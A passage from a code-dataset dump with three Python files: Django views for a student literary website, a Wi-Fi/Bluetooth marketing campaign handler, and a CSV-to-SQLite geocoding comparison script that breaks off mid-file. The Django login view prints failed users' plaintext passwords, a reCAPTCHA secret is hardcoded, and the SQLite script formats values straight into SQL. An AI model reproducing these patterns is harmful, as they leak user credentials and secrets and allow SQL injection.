"werkzeug.wrappers.Response", "line_number": 211, "usage_type": "name"}, {"api_name": "extensions.db.session.rollback", "line_number": 216, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 216, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 216, "usage_type": "name"}, {"api_name": "exceptions.BadRequestError", "line_number": 236, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 238, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 251, "usage_type": "call"}, {"api_name": "utils.url_for", "line_number": 252, "usage_type": "call"}, {"api_name": "flask_login.UserMixin", "line_number": 258, "usage_type": "name"}, {"api_name": "apps.users.models.User", "line_number": 259, "usage_type": "name"}, {"api_name": "apps.users.models.User", "line_number": 261, "usage_type": "name"}, {"api_name": "exceptions.BadRequestError", "line_number": 277, "usage_type": "call"}, {"api_name": "exceptions.BadRequestError", "line_number": 280, "usage_type": "call"}, {"api_name": "apps.users.jsonwebtoken.JSONWebToken", "line_number": 282, "usage_type": "call"}, {"api_name": "exceptions.NotFoundError", "line_number": 286, "usage_type": "name"}, {"api_name": "apps.users.jsonwebtoken.JWTError", "line_number": 286, "usage_type": "name"}, {"api_name": "extensions.login_manager.request_loader", "line_number": 268, "usage_type": "attribute"}, {"api_name": "extensions.login_manager", "line_number": 268, "usage_type": "name"}]} +{"seq_id": "410542832", "text": "from django.shortcuts import render\r\nfrom django.contrib.auth.models import User\r\nfrom django.urls import reverse\r\nfrom django.contrib.auth import authenticate,login,logout\r\nfrom website.models import *\r\nfrom website.forms import *\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nimport json\r\nimport requests\r\n\r\n# Create your views here.\r\ndef Home(request):\r\n return render(request,'website/home.html')\r\n\r\n\r\ndef home(request):\r\n return render(request,'website/home1.html')\r\n\r\n\r\ndef spotlight(request):\r\n return render(request,'website/spotlight.html')\r\n\r\n\r\ndef photo(request):\r\n return render(request,'website/dop.html')\r\n\r\ndef literary(request):\r\n objects =PublishUser.objects.order_by('-id')\r\n context = {'lists':objects}\r\n return render(request,'website/literary.html',context)\r\n\r\ndef comming(request):\r\n return render(request,'website/cmg.html')\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef userlogin(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse('website:home',))\r\n else:\r\n if request.method == \"POST\":\r\n username = request.POST.get('username')\r\n password = request.POST.get('pass')\r\n user = authenticate(username= username,password=password)\r\n if user:\r\n if user.is_active:\r\n login(request,user)\r\n return HttpResponseRedirect(reverse('website:home'))\r\n else:\r\n return HttpResponse(\"Account not active\")\r\n else:\r\n print(\"someone tried to login and failed \")\r\n print(f\"Username :{username} and password :{password}\")\r\n return HttpResponse(\"Invalid login credentials\")\r\n\r\n else:\r\n return render(request,'website/login.html',context={})\r\n\r\n\r\n# @login_required\r\n# def userinfo(request,pk):\r\n# model = User.objects.get(id=pk)\r\n# model1 = model.stories.order_by('-id')\r\n# print(model)\r\n# context = {'objects':model1}\r\n# return render(request,'website/user.html',context)\r\n#\r\n\r\n\r\n@login_required\r\ndef userinfo1(request):\r\n pk = request.user.id\r\n model = User.objects.get(id=pk)\r\n model1 = model.stories.order_by('-id')\r\n print(model)\r\n context = {'objects':model1}\r\n return render(request,'website/user.html',context)\r\n\r\n\r\n@login_required\r\ndef userlogout(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse('website:home'))\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef registration(request):\r\n registered = False\r\n if request.method == \"POST\":\r\n\r\n\r\n user_form = authenticateform(request.POST)\r\n mgit_form = MgitForms(request.POST)\r\n clientkey = request.POST['g-recaptcha-response']\r\n secretkey = \"6LdW1awZAAAAAAywOAedFlMEXxgwhWACCfPaOHDv\"\r\n sdata = {\r\n 'secret':secretkey,\r\n 'response': clientkey\r\n }\r\n r = requests.post('https://www.google.com/recaptcha/api/siteverify',data=sdata)\r\n response = json.loads(r.text)\r\n verify = response['success']\r\n print(verify)\r\n if verify:\r\n\r\n if user_form.is_valid() and mgit_form.is_valid():\r\n username = user_form.cleaned_data.get('username')\r\n password = user_form.cleaned_data.get('password')\r\n email = user_form.cleaned_data.get('email')\r\n roll = mgit_form.cleaned_data.get('Roll_number')\r\n\r\n print(username,password)\r\n user_obj = User(username=username,password= password,email=email)\r\n mgit_obj = Mgituser(Roll_number=roll)\r\n mgit_obj.user = user_obj\r\n\r\n user_obj.set_password(user_obj.password)\r\n\r\n\r\n user_obj.save()\r\n\r\n mgit_obj.save()\r\n\r\n\r\n registered = True\r\n\r\n context={\"registered\":registered}\r\n\r\n return render(request,'website/signup.html',context)\r\n else:\r\n HttpResponse(user_form.errors)\r\n HttpResponse(mgit_form.errors)\r\n\r\n else:\r\n HttpResponse('')\r\n else:\r\n\r\n context={\"registered\":registered}\r\n return render(request,'website/signup.html',context)\r\n\r\n\r\n\r\n@login_required\r\ndef newposter(request):\r\n if request.method == \"POST\":\r\n clientkey = request.POST['g-recaptcha-response']\r\n secretkey = \"6LdW1awZAAAAAAywOAedFlMEXxgwhWACCfPaOHDv\"\r\n sdata = {\r\n 'secret':secretkey,\r\n 'response': clientkey\r\n }\r\n r = requests.post('https://www.google.com/recaptcha/api/siteverify',data=sdata)\r\n response = json.loads(r.text)\r\n verify = response['success']\r\n print(verify)\r\n if verify:\r\n form = BlogContent1Form(request.POST)\r\n print('hello1')\r\n if form.is_valid():\r\n print('hello2')\r\n\r\n # form.user=user\r\n # form.save()\r\n user1= request.user\r\n\r\n user = User.objects.get(id=user1.id)\r\n # user = request.user.userna\r\n title = form.cleaned_data['title']\r\n story = form.cleaned_data['story']\r\n\r\n\r\n print('hello3')\r\n\r\n form11 = BlogContent11(user=user,title=title,story=story)\r\n\r\n print('hello4')\r\n form11.save()\r\n print('hello5s')\r\n return HttpResponseRedirect(reverse('website:userinfo'))\r\n else:\r\n print(form.errors)\r\n else:\r\n HttpResponse('')\r\n\r\n else:\r\n return render(request,'website/newpost.html')\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef publish(request,pk):\r\n content = BlogContent11.objects.get(id=pk)\r\n\r\n print('hello')\r\n if request.method == \"POST\":\r\n print('hello')\r\n author = request.POST['user']\r\n title = request.POST['title']\r\n story = request.POST['story']\r\n model = PublishUser(author=author,title=title,story=story)\r\n model.save()\r\n content = BlogContent11.objects.get(id=pk)\r\n content.publish = True\r\n content.save()\r\n\r\n\r\n return HttpResponseRedirect(reverse('website:literary'))\r\n\r\n\r\ndef comments(request,pk):\r\n if request.method == 'POST':\r\n form = CommentForms( request.POST)\r\n if form.is_valid():\r\n\r\n content = form.cleaned_data['comment']\r\n\r\n user = PublishUser.objects.get(id=pk)\r\n\r\n model = CommentUser(post=user,comment=content)\r\n model.save()\r\n\r\n return HttpResponseRedirect(reverse('website:literary'))\r\n else:\r\n print(form.errors)\r\n return HttpResponse(\"Comment Failed1\")\r\n\r\n else:\r\n return HttpResponse(\"Comment Failed\")\r\n", "sub_path": "mgit/website/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6928, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 51, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 52, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 77, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 74, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 86, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 87, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 84, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 108, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 136, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 138, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 159, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 173, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 173, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 186, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 186, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 193, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 150, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 216, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 216, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 231, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 231, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 234, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 237, "usage_type": "call"}]} +{"seq_id": "309463988", "text": "from proximus.config.ClientURISettings import ClientURISettings\nfrom proximus.data.Campaign import Campaign\nfrom proximus.handlers.GenericCampaignDownloader import \\\n GenericCampaignDownloader\nfrom proximus.interfaces.Observer import Observer\nfrom proximus.tools.SystemWriter import SystemWriter\nfrom proximus.tools.XMLUtils import XMLUtils\nimport logging\nimport os\nimport shutil\nfrom proximus.tools.Platform import Platform\nfrom proximus.tools.ProcessExecutor import ProcessExecutor\n\n\nlogger = logging.root\n\nclass CampaignHandler(Observer):\n \"\"\"\n This class exists to check and install (as needed) the appropriate\n campaigns for Wi-F and Bluetooth\n \n It should look at the data and make changes to the filesystem as needed\n \"\"\"\n def __init__(self, mainParent):\n self.mainParent = mainParent\n self.parsedXml = None\n \n self.campaigns = {}\n \n self.wasEmpty = False\n \n self.bluetoothDeployer = None\n self.wifiDeployer = None\n \n self.loadCampaigns()\n \n self.setHotSpotMode()\n \n def setHotSpotMode(self):\n correctActiveCampaign = self.getActiveCampaign(ClientURISettings.MESSAGE_WIFI)\n if (correctActiveCampaign == None):\n logger.info(\"No campaign is active (hotspot)\")\n ProcessExecutor.openCaptiveOrLimitedPortal()\n return\n \n logger.info(\"Loading initial campaign hotspot mode as \" + correctActiveCampaign.wifiCampaign.hotspotMode)\n #CAMPAIGN_NO_INTERNET = 1\n #CAMPAIGN_LIMITED = 2\n #CAMPAIGN_HOTSPOT = 3\n #CAMPAIGN_MOBILOZOPHY = 4\n #CAMPAIGN_FACEBOOK = 5\n if (Platform.getPlatform() == Platform.PLATFORM_LINUX_DREAMPLUG):\n if (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_HOTSPOT)):\n ProcessExecutor.openHotspotPortal()\n elif (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_NO_INTERNET)):\n ProcessExecutor.openCaptiveOrLimitedPortal()\n elif (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_LIMITED)):\n ProcessExecutor.openCaptiveOrLimitedPortal()\n elif (int(correctActiveCampaign.wifiCampaign.hotspotMode) == int(ClientURISettings.CAMPAIGN_FACEBOOK)):\n ProcessExecutor.openFacebookPortal()\n else:\n logger.error(\"Not sure what to do with wifi campaign of type \" + correctActiveCampaign.wifiCampaign.hotspotMode)\n else:\n logger.debug(\"Alternate campaign modes not set up for this platform\")\n \n \"\"\" called at startup only to load from filesystem\"\"\"\n def loadCampaigns(self):\n \n logger.info(\"Loading configuration from:\" + ClientURISettings.CAMPAIGNS_FILE)\n if not (os.path.exists(ClientURISettings.CAMPAIGNS_FILE) and os.path.isfile(ClientURISettings.CAMPAIGNS_FILE)):\n return\n try:\n self.parsedXml = XMLUtils.readNodeFromFile(ClientURISettings.CAMPAIGNS_FILE)\n self.parseNode(self.parsedXml)\n except Exception as err:\n logger.error(err)\n \n def saveCampaigns(self):\n if (self.parsedXml != None):\n stringCurrentXML = XMLUtils.elementToString(self.parsedXml)\n stringSavedXML = SystemWriter.readFileToString(ClientURISettings.CAMPAIGNS_FILE)\n if ((stringCurrentXML != stringSavedXML) and (len(stringCurrentXML) > 0)):\n XMLUtils.writeNodeToFile(ClientURISettings.CAMPAIGNS_FILE, self.parsedXml)\n logger.info(\"Campaigns updated on file system\")\n else:\n logger.info(\"Campaigns change not needed\")\n else:\n logger.error(\"Cannot save Campaigns: no data available\")\n \n def notify(self, obj):\n if isinstance(obj, Campaign):\n logger.debug(\"Campaign processed -- not really\")\n \n \"\"\"Return the most recent campaign that is active right this minute\"\"\"\n def getActiveCampaign(self, type):\n activeCampaigns = []\n for campaign in self.campaigns.values():\n if type in campaign.type:\n if campaign.isActive():\n activeCampaigns.append(campaign)\n \n if (len(activeCampaigns) > 0):\n activeCampaignsSorted = sorted(activeCampaigns, key=lambda campaign: campaign.last_modified)\n return activeCampaignsSorted[len(activeCampaigns) - 1]\n\n def getAllCampaignsByType(self, campaignType):\n typedCampaigns = []\n \n for campaign in self.campaigns.values():\n if campaignType == ClientURISettings.MESSAGE_WIFI and campaign.wifiCampaign != None:\n typedCampaigns.append(campaign)\n elif campaignType == ClientURISettings.MESSAGE_BLUETOOTH and campaign.bluetoothCampaign != None:\n typedCampaigns.append(campaign)\n \n return typedCampaigns\n\n def parseNode(self, campaignsNode):\n \n campaigns_changed = False\n \n self.parsedXml = campaignsNode\n \n new_campaigns = {}\n for parsedNode in campaignsNode.findall(\"campaign\"):\n campaign = Campaign(parsedNode)\n new_campaigns[campaign.id] = campaign\n \n # first, if any campaigns are in the old list and not in the new\n # remove them\n for campaign_id in self.campaigns.keys():\n if not new_campaigns.has_key(campaign_id):\n logger.info(\"Removing campaign %s\" % campaign_id)\n del self.campaigns[campaign_id]\n \n campaignFolder = ClientURISettings.CAMPAIGNS_ROOT_DIR + os.sep + campaign_id\n if os.path.isdir(campaignFolder):\n shutil.rmtree(campaignFolder)\n \n campaigns_changed = True\n logger.info(\"Campaign removed: %s\" % campaign_id)\n \n # check each to see if it is deployed already or not\n # if not, deploy it\n for (campaign_id, campaign) in new_campaigns.items():\n if not self.campaigns.has_key(campaign_id) or not (self.campaigns[campaign_id] == new_campaigns[campaign_id]):\n self.campaigns[campaign_id] = campaign\n campaigns_changed = True\n logger.info(\"Adding campaign %s\" % campaign_id)\n \n if (campaigns_changed):\n self.loadAllCampaigns()\n self.saveCampaigns()\n \n def loadAllCampaigns(self):\n wiFiCampaigns = self.getAllCampaignsByType(ClientURISettings.MESSAGE_WIFI)\n bTCampaigns = self.getAllCampaignsByType(ClientURISettings.MESSAGE_BLUETOOTH)\n \n if (len(wiFiCampaigns) > 0):\n self.wifiDeployer = GenericCampaignDownloader(ClientURISettings.MESSAGE_WIFI, wiFiCampaigns)\n self.wifiDeployer.start()\n else:\n logger.info(\"No active WI-FI campaign\")\n \n if (len(bTCampaigns) > 0):\n self.bluetoothDeployer = GenericCampaignDownloader(ClientURISettings.MESSAGE_BLUETOOTH, bTCampaigns)\n self.bluetoothDeployer.start()\n else:\n logger.info(\"No active Bluetooth campaign\")\n", "sub_path": "Proximus-2.0-master/ProximusTomorrow/ProximusTomorrow-dreamplugClient/proximus-client/tmp/client/home/proximus/bin/client/proximus/handlers/CampaignHandler.py", "file_name": "CampaignHandler.py", "file_ext": "py", "file_size_in_byte": 7286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.root", "line_number": 15, "usage_type": "attribute"}, {"api_name": "proximus.interfaces.Observer.Observer", "line_number": 17, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 40, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 40, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openCaptiveOrLimitedPortal", "line_number": 43, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 43, "usage_type": "name"}, {"api_name": "proximus.tools.Platform.Platform.getPlatform", "line_number": 52, "usage_type": "call"}, {"api_name": "proximus.tools.Platform.Platform", "line_number": 52, "usage_type": "name"}, {"api_name": "proximus.tools.Platform.Platform.PLATFORM_LINUX_DREAMPLUG", "line_number": 52, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_HOTSPOT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 53, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openHotspotPortal", "line_number": 54, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 54, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_NO_INTERNET", "line_number": 55, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 55, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openCaptiveOrLimitedPortal", "line_number": 56, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 56, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_LIMITED", "line_number": 57, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 57, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openCaptiveOrLimitedPortal", "line_number": 58, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 58, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGN_FACEBOOK", "line_number": 59, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 59, "usage_type": "name"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor.openFacebookPortal", "line_number": 60, "usage_type": "call"}, {"api_name": "proximus.tools.ProcessExecutor.ProcessExecutor", "line_number": 60, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 70, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils.readNodeFromFile", "line_number": 73, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils", "line_number": 73, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 73, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 73, "usage_type": "name"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils.elementToString", "line_number": 80, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils", "line_number": 80, "usage_type": "name"}, {"api_name": "proximus.tools.SystemWriter.SystemWriter.readFileToString", "line_number": 81, "usage_type": "call"}, {"api_name": "proximus.tools.SystemWriter.SystemWriter", "line_number": 81, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 81, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 81, "usage_type": "name"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils.writeNodeToFile", "line_number": 83, "usage_type": "call"}, {"api_name": "proximus.tools.XMLUtils.XMLUtils", "line_number": 83, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_FILE", "line_number": 83, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 83, "usage_type": "name"}, {"api_name": "proximus.data.Campaign.Campaign", "line_number": 91, "usage_type": "argument"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 110, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 110, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_BLUETOOTH", "line_number": 112, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 112, "usage_type": "name"}, {"api_name": "proximus.data.Campaign.Campaign", "line_number": 125, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.CAMPAIGNS_ROOT_DIR", "line_number": 135, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 135, "usage_type": "name"}, {"api_name": "os.sep", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 137, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 155, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 155, "usage_type": "name"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_BLUETOOTH", "line_number": 156, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 156, "usage_type": "name"}, {"api_name": "proximus.handlers.GenericCampaignDownloader.GenericCampaignDownloader", "line_number": 159, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_WIFI", "line_number": 159, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 159, "usage_type": "name"}, {"api_name": "proximus.handlers.GenericCampaignDownloader.GenericCampaignDownloader", "line_number": 165, "usage_type": "call"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings.MESSAGE_BLUETOOTH", "line_number": 165, "usage_type": "attribute"}, {"api_name": "proximus.config.ClientURISettings.ClientURISettings", "line_number": 165, "usage_type": "name"}]} +{"seq_id": "203814732", "text": "#!/bin/bash\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# Author: Deontae Lafayette\t\t\t\t\t\t\t\t\t\t#\n# Institution: University of Florida\t\t\t\t\t\t\t#\n# Department: Electrical Engineering\t\t\t\t\t\t\t#\n# Lab: ACIS (Advanced Computing and Information Systems)\t\t#\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nfrom __future__ import division\nimport csv, sqlite3, os, urllib, requests, json, configparser, sys\n\n# Information Logging\ndef log(message, logfile):\n\twith open(logfile, 'a') as file:\n\t\tfile.write('%s\\n' % (message))\n\tfile.close()\n\n#Connect to sqlite database\ndef populateDatabase():\n\t# Open CSV\n\tprint(\"Building Database . . .\")\n\twith open('location_fields.csv', 'rb') as csvfile:\n\t\t# Loop through CSV and Set name = uuidentifier key = headerName value = csvValue \n\t\tcsvreader = csv.reader(csvfile, dialect='excel')\n\t\trow = 0\n\t\tfor line in csvreader:\n\t\t\tif row == 0: \n\t\t\t\theader = line\n\t\t\t\tplaceholders = '?'\n\t\t\t\tplaceholders= ', '.join(placeholders for unused in header)\n\t\t\t\tquery = \"CREATE TABLE %s %s\" % (TEMPTABLENAME, tuple(header)) \n\t\t\t\tcur.execute(query)\n\t\t\t\t#log(\"Staged Query: %s\" % (query), infoLog)\n\t\t\t\trow += 1\n\t\t\telse:\n\t\t\t\tplaceholders = '?'\n\t\t\t\tplaceholders= ', '.join(placeholders for unused in line)\n\t\t\t\tquery = \"INSERT INTO %s VALUES (%s)\" % (TEMPTABLENAME, placeholders)\n\t\t\t\t#print line\n\t\t\t\t#print query\n\t\t\t\tcur.execute(query, tuple(line))\n\t\t\t\t#log(\"Staged Query: %s\" % (query), infoLog)\n\t# Close CSV\n\tcsvfile.close()\n\tcon.commit()\n\tlog(\"\\tChanges Committed to DataBase\", infoLog)\n\tprint(\"Complete!\")\n\t\n\treturn 1\n\ndef exportTable(dbName, tableName):\n\twith open('newcsv.csv', 'wb') as csvfile:\n\t\tcsvwriter = csv.writer(csvfile, dialect='excel')\n\t\tfor res in cur.execute(\"SELECT * FROM %s\") % (TEMPTABLENAME):\n\t\t\tcsvwriter.writerow(res) \n\t\n\tcsvfile.close()\n\treturn 1\n\t\ndef getUniqueCoordinates():\n\tprint(\"Building Unique Coordinate List . . . \")\n\tcoordinateList = []\n\tquery = \"SELECT decimalLatitude, decimalLongitude FROM %s\" % (TEMPTABLENAME)\n\tfor res in cur.execute(query):\n\t\tcoordinateList.append(', '.join(map(str, res)))\n\ttempSet = set(coordinateList)\n\tuniqueCoordinateList = list(tempSet)\n\t\n\tprint(\"Complete!\")\n\treturn uniqueCoordinateList\n\ndef updateRecord(value, lat, long, column):\n\t\n\tquery = \"UPDATE %s SET %s='%s' WHERE decimalLatitude='%s' AND decimalLongitude='%s'\" % (TEMPTABLENAME, column, value, lat, long)\t\n\treturn cur.execute(query)\n\t\ndef getRecord(lat, long, column='*'):\n\tquery = \"SELECT %s FROM %s WHERE decimalLatitude='%s' AND decimalLongitude='%s'\" % (column, TEMPTABLENAME, lat, long)\n\treturn cur.execute(query)\n\t\ndef dstkCompare(coordinates, URL):\n\tprint(\"Comparing Records . . .\")\n\t\n\tfor pair in coordinates:\n\t\tlat, long = pair.split(',')\n\t\tlat = lat.strip()\n\t\tlong = long.strip()\n\t\t#print lat\n\t\t#print long\n\t\tencodedCoordinates = urllib.quote(pair)\n\t\thttpAddress = URL + encodedCoordinates\n\t\t#print httpAddress\n\t\treq = requests.request('GET', httpAddress)\n\t\t#print req.text\n\t\tjsonData = json.loads(req.text)\n\t\tif jsonData[0]['politics']:\n\t\t\tx = 0\n\t\t\twhile x < len(jsonData[0]['politics']): # Loop through all data\n\t\t\t\tif jsonData[0]['politics'][x]['friendly_type'] == 'state': # if data type is of state compare state info to existing record.\n\t\t\t\t\tgetRecord(lat, long, 'stateProvince')\n\t\t\t\t\tdbValue = ''.join(map(str, cur.fetchone()))\n\t\t\t\t\tdstkValue = jsonData[0]['politics'][x]['name']\n\t\t\t\t\tif dbValue != dstkValue:\n\t\t\t\t\t\tupdateRecord(dstkValue, lat, long, 'stateProvince')\n\t\t\t\t\t\t#print dbValue + ' <<<<>>>> ' + dstkValue + \" %s, %s\" % (lat, long)\n\t\t\t\t\n\t\t\t\telif jsonData[0]['politics'][x]['friendly_type'] == 'city':\n\t\t\t\t\tgetRecord(lat, long, 'municipality')\n\t\t\t\t\tdbValue = ''.join(map(str, cur.fetchone()))\n\t\t\t\t\tdstkValue = jsonData[0]['politics'][x]['name']\n\t\t\t\t\tif dbValue != dstkValue:\n\t\t\t\t\t\tupdateRecord(dstkValue, lat, long, 'municipality')\n\t\t\t\t\t\t#print dbValue + ' <<<<>>>> ' + dstkValue + \" %s, %s\" % (lat, long)\n\t\t\t\t\n\t\t\t\telif jsonData[0]['politics'][x]['friendly_type'] == 'country':\n\t\t\t\t\tgetRecord(lat, long, 'country')\n\t\t\t\t\tdbValue = ''.join(map(str, cur.fetchone()))\n\t\t\t\t\tdstkValue = jsonData[0]['politics'][x]['name']\n\t\t\t\t\tif dbValue != dstkValue:\n\t\t\t\t\t\tupdateRecord(dstkValue, lat, long, 'country')\n\t\t\t\t\t\t#print dbValue + ' <<<<>>>> ' + dstkValue + \" %s, %s\" 